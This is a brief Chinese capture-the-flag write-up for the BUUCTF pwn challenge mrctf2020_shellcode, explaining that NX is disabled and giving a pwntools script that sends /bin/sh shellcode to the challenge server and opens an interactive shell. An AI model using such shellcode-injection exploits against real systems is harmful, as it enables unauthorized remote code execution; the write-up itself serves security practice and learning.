[BUUCTF-pwn]——mrctf2020_shellcode 没开NX保护,发现F5不可以,就看汇编吧 这不就是相当于你写入shellcode然后执行嘛 exploit from pwn import * p=remote("node3.buuoj.cn",26104) context.arch='amd64' shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.interactive()